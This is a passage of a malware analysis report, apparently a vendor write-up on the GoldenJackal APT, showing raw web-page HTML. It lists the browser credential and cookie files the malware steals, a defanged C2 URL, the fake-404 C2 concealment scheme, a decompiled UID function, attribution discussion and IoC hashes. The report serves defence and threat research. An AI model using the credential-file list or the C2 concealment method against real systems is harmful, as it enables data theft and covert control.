margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" 
title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> Desktop\*.txt Documents\*.txt AppData\Local\Microsoft\Windows\WebCache\*.log AppData\Roaming\Microsoft\Windows\Cookies\*.txt AppData\Local\Google\Chrome\User Data\*\Bookmarks AppData\Local\Google\Chrome\User Data\*\Cookies AppData\Local\Google\Chrome\User Data\*\History AppData\Local\Google\Chrome\User Data\*\Login Data AppData\Local\Google\Chrome\User Data\*\Shortcuts AppData\Local\Google\Chrome\User Data\*\Web Data AppData\Roaming\Opera\Opera\*\bookmarks.adr AppData\Roaming\Opera\Opera\*\global_history.dat AppData\Roaming\Mozilla\Firefox\Profiles\*\places.sqlite AppData\Roaming\Mozilla\Firefox\Profiles\*\cookies.sqlite AppData\Roaming\Mozilla\Firefox\Profiles\*\formhistory.sqlite</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d94679a3896987430-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a3896987430-2">2</div><div class="crayon-num" data-line="crayon-67b40d94679a3896987430-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a3896987430-4">4</div><div class="crayon-num" data-line="crayon-67b40d94679a3896987430-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a3896987430-6">6</div><div 
class="crayon-num" data-line="crayon-67b40d94679a3896987430-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a3896987430-8">8</div><div class="crayon-num" data-line="crayon-67b40d94679a3896987430-9">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a3896987430-10">10</div><div class="crayon-num" data-line="crayon-67b40d94679a3896987430-11">11</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a3896987430-12">12</div><div class="crayon-num" data-line="crayon-67b40d94679a3896987430-13">13</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a3896987430-14">14</div><div class="crayon-num" data-line="crayon-67b40d94679a3896987430-15">15</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d94679a3896987430-1"><span class="crayon-i">Desktop</span><span class="crayon-sy">\</span>*<span class="crayon-sy">.</span><span class="crayon-e">txt</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a3896987430-2"><span class="crayon-i">Documents</span><span class="crayon-sy">\</span>*<span class="crayon-sy">.</span><span class="crayon-e">txt</span></div><div class="crayon-line" id="crayon-67b40d94679a3896987430-3"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Local</span><span class="crayon-sy">\</span><span class="crayon-i">Microsoft</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">WebCache</span><span class="crayon-sy">\</span>*<span class="crayon-sy">.</span><span class="crayon-e">log</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a3896987430-4"><span class="crayon-i">AppData</span><span 
class="crayon-sy">\</span><span class="crayon-i">Roaming</span><span class="crayon-sy">\</span><span class="crayon-i">Microsoft</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">Cookies</span><span class="crayon-sy">\</span>*<span class="crayon-sy">.</span><span class="crayon-e">txt</span></div><div class="crayon-line" id="crayon-67b40d94679a3896987430-5"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Local</span><span class="crayon-sy">\</span><span class="crayon-i">Google</span><span class="crayon-sy">\</span><span class="crayon-i">Chrome</span><span class="crayon-sy">\</span><span class="crayon-e">User </span><span class="crayon-i">Data</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-e">Bookmarks</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a3896987430-6"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Local</span><span class="crayon-sy">\</span><span class="crayon-i">Google</span><span class="crayon-sy">\</span><span class="crayon-i">Chrome</span><span class="crayon-sy">\</span><span class="crayon-e">User </span><span class="crayon-i">Data</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-e">Cookies</span></div><div class="crayon-line" id="crayon-67b40d94679a3896987430-7"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Local</span><span class="crayon-sy">\</span><span class="crayon-i">Google</span><span class="crayon-sy">\</span><span class="crayon-i">Chrome</span><span class="crayon-sy">\</span><span class="crayon-e">User </span><span class="crayon-i">Data</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-e">History</span></div><div class="crayon-line crayon-striped-line" 
id="crayon-67b40d94679a3896987430-8"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Local</span><span class="crayon-sy">\</span><span class="crayon-i">Google</span><span class="crayon-sy">\</span><span class="crayon-i">Chrome</span><span class="crayon-sy">\</span><span class="crayon-e">User </span><span class="crayon-i">Data</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-e">Login </span><span class="crayon-e">Data</span></div><div class="crayon-line" id="crayon-67b40d94679a3896987430-9"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Local</span><span class="crayon-sy">\</span><span class="crayon-i">Google</span><span class="crayon-sy">\</span><span class="crayon-i">Chrome</span><span class="crayon-sy">\</span><span class="crayon-e">User </span><span class="crayon-i">Data</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-e">Shortcuts </span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a3896987430-10"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Local</span><span class="crayon-sy">\</span><span class="crayon-i">Google</span><span class="crayon-sy">\</span><span class="crayon-i">Chrome</span><span class="crayon-sy">\</span><span class="crayon-e">User </span><span class="crayon-i">Data</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-e">Web </span><span class="crayon-e">Data</span></div><div class="crayon-line" id="crayon-67b40d94679a3896987430-11"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Roaming</span><span class="crayon-sy">\</span><span class="crayon-i">Opera</span><span class="crayon-sy">\</span><span class="crayon-i">Opera</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span 
class="crayon-i">bookmarks</span><span class="crayon-sy">.</span><span class="crayon-e">adr</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a3896987430-12"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Roaming</span><span class="crayon-sy">\</span><span class="crayon-i">Opera</span><span class="crayon-sy">\</span><span class="crayon-i">Opera</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-i">global_history</span><span class="crayon-sy">.</span><span class="crayon-e">dat</span></div><div class="crayon-line" id="crayon-67b40d94679a3896987430-13"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Roaming</span><span class="crayon-sy">\</span><span class="crayon-i">Mozilla</span><span class="crayon-sy">\</span><span class="crayon-i">Firefox</span><span class="crayon-sy">\</span><span class="crayon-i">Profiles</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-i">places</span><span class="crayon-sy">.</span><span class="crayon-e">sqlite</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a3896987430-14"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Roaming</span><span class="crayon-sy">\</span><span class="crayon-i">Mozilla</span><span class="crayon-sy">\</span><span class="crayon-i">Firefox</span><span class="crayon-sy">\</span><span class="crayon-i">Profiles</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-i">cookies</span><span class="crayon-sy">.</span><span class="crayon-e">sqlite</span></div><div class="crayon-line" id="crayon-67b40d94679a3896987430-15"><span class="crayon-i">AppData</span><span class="crayon-sy">\</span><span class="crayon-i">Roaming</span><span class="crayon-sy">\</span><span class="crayon-i">Mozilla</span><span 
class="crayon-sy">\</span><span class="crayon-i">Firefox</span><span class="crayon-sy">\</span><span class="crayon-i">Profiles</span><span class="crayon-sy">\</span>*<span class="crayon-sy">\</span><span class="crayon-i">formhistory</span><span class="crayon-sy">.</span><span class="crayon-i">sqlite</span></div></div></td> </tr> </table> </div> </div><p> The malware attempts to steal credentials stored in the victim’s browser databases, as well as other information such as cookies that could be used to gain access to web services.</p> <p>Finally, it serializes the collected information to a binary format, compresses all the data with the GZIP algorithm, and stores everything in the file specified with the first argument provided by the attacker.</p> <h2 id="jackalscreenwatcher">JackalScreenWatcher</h2> <p>This tool collects screenshots of the victim’s desktop and sends the pictures to a remote, hard-coded C2 server:</p> <p style="text-align: center">hxxps://tahaherbal[.]ir/wp-includes/class-wp-http-iwr-client.php</p> <p>This specific webpage was also used as a C2 for the JackalSteal component, indicating that the tools are probably part of a single framework.</p> <p>The malware accepts the following optional arguments:</p> <ul> <li>-r resolution ratio (default 1.0)</li> <li>-i interval (default 10 seconds)</li> <li>-n specify a custom agent id. By default, this value is equal to: %Hostname%\%Username%</li> </ul> <p>The program’s primary function involves running a thread that scans all displays on the system, checking their dimensions. It then starts an infinite loop, periodically checking if the user is active on the system. Whenever the malware detects user activity, it captures a screenshot and sends it to the remote server.</p> <p>User activity is detected by monitoring the cursor’s position and checking if it has changed since the last recorded position. 
After uploading a screenshot, it waits for the configured interval (the -i argument, 10 seconds by default) before restarting the loop.</p> <p>The screenshots are uploaded inside an encrypted payload using HTTP POST requests.</p> <p>The encrypted payload is similar to that used by JackalSteal and contains the following information:</p> <p><code>|<AES_Key,AES_IV><Remote filename><Screenshot>|</code></p> <p>AES_Key and AES_IV are encrypted with the RSA algorithm using a key embedded in the code. The resulting payload is also compressed with the GZIP algorithm.</p> <p>The Remote filename and Screenshot data are encrypted with the AES algorithm and compressed with GZIP. The RSA key is the same as that observed in other JackalSteal components.</p> <h2 id="infrastructure">Infrastructure</h2> <p>GoldenJackal activity is characterized by the use of compromised WordPress websites to host C2-related logic. We believe the attackers upload a malicious PHP file that is used as a relay to forward web requests to another backbone C2 server.</p> <p>We don’t have any evidence of the vulnerabilities used to compromise the sites. However, we did observe that many of the websites were running obsolete versions of WordPress, and some had also been defaced or infected with previously uploaded web shells, likely as a result of low-key hacktivist or cybercriminal activity. For this reason, we assess that the vulnerabilities used to breach these websites are known ones rather than 0-days.</p> <p>The remote webpage usually replies with a fake “Not Found” page. 
The HTTP response status code is “200”, but the HTTP body shows a “Not found” webpage.</p> <div id="crayon-67b40d94679a4143157538" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div><span class="crayon-language">XHTML</span></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL %FILE PATH% was not found on this server.</p> <hr> <address>%SERVER%</address> </body></html></textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 
12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d94679a4143157538-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a4143157538-2">2</div><div class="crayon-num" data-line="crayon-67b40d94679a4143157538-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a4143157538-4">4</div><div class="crayon-num" data-line="crayon-67b40d94679a4143157538-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a4143157538-6">6</div><div class="crayon-num" data-line="crayon-67b40d94679a4143157538-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a4143157538-8">8</div><div class="crayon-num" data-line="crayon-67b40d94679a4143157538-9">9</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d94679a4143157538-1"><span class="crayon-n"><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"></span><span class="crayon-i "> </span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a4143157538-2"><span class="crayon-r "><html></span><span class="crayon-r "><head></span></div><div class="crayon-line" id="crayon-67b40d94679a4143157538-3"><span class="crayon-r "><title></span><span class="crayon-i ">404 Not Found</span><span class="crayon-r "></title></span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a4143157538-4"><span class="crayon-r "></head></span><span class="crayon-r "><body></span></div><div class="crayon-line" id="crayon-67b40d94679a4143157538-5"><span class="crayon-r "><h1></span><span class="crayon-i ">Not Found</span><span class="crayon-r "></h1></span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a4143157538-6"><span class="crayon-r "><p></span><span 
class="crayon-i ">The requested URL %FILE PATH% was not found on this server.</span><span class="crayon-r "></p></span></div><div class="crayon-line" id="crayon-67b40d94679a4143157538-7"><span class="crayon-r "><hr></span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a4143157538-8"><span class="crayon-r "><address></span><span class="crayon-i ">%SERVER%</span><span class="crayon-r "></address></span></div><div class="crayon-line" id="crayon-67b40d94679a4143157538-9"><span class="crayon-r "></body></span><span class="crayon-r "></html></span></div></div></td> </tr> </table> </div> </div><p> In specific cases, the attacker provides a valid response with a list of commands. In those cases, the previous body is followed by a long list of standard Windows new line sequences – “\r\n” – and finally the previously mentioned delimiter:</p> <div id="crayon-67b40d94679a6497902964" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; margin-left: auto; margin-right: auto; clear: none; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div 
class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> <!-- DEBUGDATA::%ENCODED_DATA% --></textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d94679a6497902964-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d94679a6497902964-1"><span class="crayon-h"><</span><span class="crayon-sy">!</span>--<span class="crayon-h"> </span><span class="crayon-i">DEBUGDATA</span><span class="crayon-sy">:</span><span class="crayon-sy">:</span><span class="crayon-sy">%</span><span class="crayon-i">ENCODED_DATA</span><span class="crayon-sy">%</span><span class="crayon-h"> </span>--<span class="crayon-h">></span></div></div></td> </tr> </table> </div> </div><p> <h2 id="victims">Victims</h2> <p>Over the years, we have observed a limited number of attacks against government and diplomatic entities in the Middle East and South Asia. 
We observed victims in Afghanistan, Azerbaijan, Iran, Iraq, Pakistan and Turkey.</p> <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/22142912/GoldenJackal_APT_11.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-109718" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/22142912/GoldenJackal_APT_11.png" alt="Geography of victims" width="735" height="411" /></a></p> <p style="text-align: center"><strong><em>Geography of victims</em></strong></p> <h2 id="attribution">Attribution</h2> <p>We are unable to link GoldenJackal to any known actor.</p> <p>During our investigations, we observed some similarities between GoldenJackal and Turla. Specifically, we noticed a code similarity in the victim UID generation algorithm that overlaps somewhat with that used by Kazuar.</p> <p>In Kazuar's case, the malware gets the MD5 hash of a predefined string and then XORs it with a four-byte unique “seed” from the machine. 
The seed is obtained by fetching the serial number of the volume where the operating system is installed.</p> <div id="crayon-67b40d94679a7390360379" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div><span class="crayon-language">XHTML</span></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> public static Guid md5_plus_xor(string string_0) { byte[] bytes = BitConverter.GetBytes(parameter_class.unique_pc_identifier); byte[] array = MD5.Create().ComputeHash(get_bytes_wrapper(string_0)); for (int i = 0; i < array.Length; i++) { byte[] array2 = array; int num = i; array2[num] ^= bytes[i % bytes.Length]; } return new Guid(array); }</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr 
class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d94679a7390360379-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a7390360379-2">2</div><div class="crayon-num" data-line="crayon-67b40d94679a7390360379-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a7390360379-4">4</div><div class="crayon-num" data-line="crayon-67b40d94679a7390360379-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a7390360379-6">6</div><div class="crayon-num" data-line="crayon-67b40d94679a7390360379-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a7390360379-8">8</div><div class="crayon-num" data-line="crayon-67b40d94679a7390360379-9">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a7390360379-10">10</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d94679a7390360379-1">public<span class="crayon-h"> </span>static<span class="crayon-h"> </span>Guid<span class="crayon-h"> </span>md5<span class="crayon-sy">_</span>plus<span class="crayon-sy">_</span>xor<span class="crayon-sy">(</span>string<span class="crayon-h"> </span>string<span class="crayon-sy">_</span>0<span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-sy">{</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a7390360379-2"><span class="crayon-h"> </span>byte<span class="crayon-sy">[</span><span class="crayon-sy">]</span><span class="crayon-h"> </span>bytes<span class="crayon-h"> </span>=<span class="crayon-h"> </span>BitConverter<span class="crayon-sy">.</span>GetBytes<span 
class="crayon-sy">(</span>parameter<span class="crayon-sy">_</span>class<span class="crayon-sy">.</span>unique<span class="crayon-sy">_</span>pc<span class="crayon-sy">_</span>identifier<span class="crayon-sy">)</span><span class="crayon-sy">;</span></div><div class="crayon-line" id="crayon-67b40d94679a7390360379-3"><span class="crayon-h"> </span>byte<span class="crayon-sy">[</span><span class="crayon-sy">]</span><span class="crayon-h"> </span>array<span class="crayon-h"> </span>=<span class="crayon-h"> </span>MD5<span class="crayon-sy">.</span>Create<span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span>ComputeHash<span class="crayon-sy">(</span>get<span class="crayon-sy">_</span>bytes<span class="crayon-sy">_</span>wrapper<span class="crayon-sy">(</span>string<span class="crayon-sy">_</span>0<span class="crayon-sy">)</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a7390360379-4"><span class="crayon-h"> </span>for<span class="crayon-h"> </span><span class="crayon-sy">(</span>int<span class="crayon-h"> </span>i<span class="crayon-h"> </span>=<span class="crayon-h"> </span>0<span class="crayon-sy">;</span><span class="crayon-h"> </span>i<span class="crayon-h"> </span><span class="crayon-r ">< array.Length; </span>i++<span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-sy">{</span></div><div class="crayon-line" id="crayon-67b40d94679a7390360379-5"><span class="crayon-h"> </span>byte<span class="crayon-sy">[</span><span class="crayon-sy">]</span><span class="crayon-h"> </span>array2<span class="crayon-h"> </span>=<span class="crayon-h"> </span>array<span class="crayon-sy">;</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a7390360379-6"><span class="crayon-h"> </span>int<span class="crayon-h"> </span>num<span class="crayon-h"> </span>=<span class="crayon-h"> </span>i<span 
class="crayon-sy">;</span></div><div class="crayon-line" id="crayon-67b40d94679a7390360379-7"><span class="crayon-h"> </span>array2<span class="crayon-sy">[</span>num<span class="crayon-sy">]</span><span class="crayon-h"> </span>^=<span class="crayon-h"> </span>bytes<span class="crayon-sy">[</span>i<span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-h"> </span>bytes<span class="crayon-sy">.</span>Length<span class="crayon-sy">]</span><span class="crayon-sy">;</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a7390360379-8"><span class="crayon-h"> </span><span class="crayon-sy">}</span></div><div class="crayon-line" id="crayon-67b40d94679a7390360379-9"><span class="crayon-h"> </span>return<span class="crayon-h"> </span>new<span class="crayon-h"> </span>Guid<span class="crayon-sy">(</span>array<span class="crayon-sy">)</span><span class="crayon-sy">;</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a7390360379-10"><span class="crayon-sy">}</span></div></div></td> </tr> </table> </div> </div><p> JackalControl uses an MD5+SHIFT algorithm. It collects a set of information from the machine, including the serial number of the volume where the operating system is installed, to generate a unique seed with the MD5 algorithm. 
It then takes the resulting MD5 hash, sums every two consecutive bytes of it, and uses the sums (modulo 256) as the byte sequence that forms the final BOT_ID.</p> <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16215704/GoldenJackal_APT_05.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-109712" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16215704/GoldenJackal_APT_05.png" alt="Code snippet used to generate the BOT_ID" width="591" height="127" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16215704/GoldenJackal_APT_05.png 591w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16215704/GoldenJackal_APT_05-300x64.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16215704/GoldenJackal_APT_05-370x80.png 370w" sizes="auto, (max-width: 591px) 100vw, 591px" /></a></p> <p style="text-align: center"><strong><em>Code snippet used to generate the BOT_ID</em></strong></p> <p>Moreover, the use of tools developed in .NET and of compromised WordPress websites as C2 is a common Turla TTP.</p> <p>Last but not least, the groups share an interest in the same targets, and in one specific case we observed that a victim machine was infected with a Turla artifact two months before the GoldenJackal infection.</p> <p>Despite these similarities, we assessed with low confidence that there is a connection between GoldenJackal and Turla, since none of these traits is unique to either threat actor. The use of compromised WordPress websites is not a unique TTP. This technique was also observed in activity by other groups such as BlackShadow, another APT active in the Middle East that uses .NET malware. 
The code similarities are confined to a single function in a .NET program that could be easily copied with a decompiler. It is possible that GoldenJackal used that algorithm as a false flag. Another hypothesis is that the developers behind JackalControl were inspired by Turla and decided to replicate the UID generation algorithm. Finally, the shared interest in the same targets is easily explained by the fact that the victims are high-profile targets that could be considered interesting by different actors.</p> <h2 id="conclusions">Conclusions</h2> <p>GoldenJackal is an interesting APT actor that tries to keep a low profile. Despite its long-term activities, which are believed to have started in June 2019, this group and the related samples are still generally unknown.</p> <p>The group is probably trying to reduce its visibility by limiting the number of victims. According to our telemetry, the number of targets is very low and most of them were related to government or diplomatic entities. Moreover, some of the samples were deployed only on systems that were not protected by Kaspersky during the infection phase. This may indicate that the actor is trying to protect some of its tools and avoid specific security solutions.</p> <p>Their toolkit seems to be under development – the number of variants shows that they are still investing in it. The latest malware, JackalWorm, emerged in the second half of 2022 and appears to still be in the testing phase. This tool was unexpected because in previous years the attacks were limited to a small group of high-profile entities, and a tool like JackalWorm is probably difficult to contain and can easily get out of control.</p> <p>More information about GoldenJackal, including IoCs and YARA rules, is available to customers of the Kaspersky Intelligence Reporting Service. 
Contact: <a href="mailto:intelreports@kaspersky.com" target="_blank" rel="noopener">intelreports@kaspersky.com</a>.</p> <h2 id="indicators-of-compromise">Indicators of compromise</h2> <h3 id="md5-hashes">MD5 hashes</h3> <p><strong>JackalControl</strong><br /> <a href="https://opentip.kaspersky.com/5ed498f9ad6e74442b9b6fe289d9feb3/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">5ed498f9ad6e74442b9b6fe289d9feb3</a><br /> <a href="https://opentip.kaspersky.com/a5ad15a9115a60f15b7796bc717a471d/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">a5ad15a9115a60f15b7796bc717a471d</a><br /> <a href="https://opentip.kaspersky.com/c6e5c8bd7c066008178bc1fb19437763/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">c6e5c8bd7c066008178bc1fb19437763</a><br /> <a href="https://opentip.kaspersky.com/4f041937da7748ebf6d0bbc44f1373c9/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">4f041937da7748ebf6d0bbc44f1373c9</a><br /> <a href="https://opentip.kaspersky.com/eab4f3a69b2d30b16df3d780d689794c/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">eab4f3a69b2d30b16df3d780d689794c</a><br /> <a href="https://opentip.kaspersky.com/8c1070f188ae87fba1148a3d791f2523/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">8c1070f188ae87fba1148a3d791f2523</a></p> <p><strong>JackalSteal</strong><br /> <a href="https://opentip.kaspersky.com/c05999b9390a3d8f4086f6074a592bc2/?utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">c05999b9390a3d8f4086f6074a592bc2</a></p> <p><strong>JackalWorm</strong><br /> <a 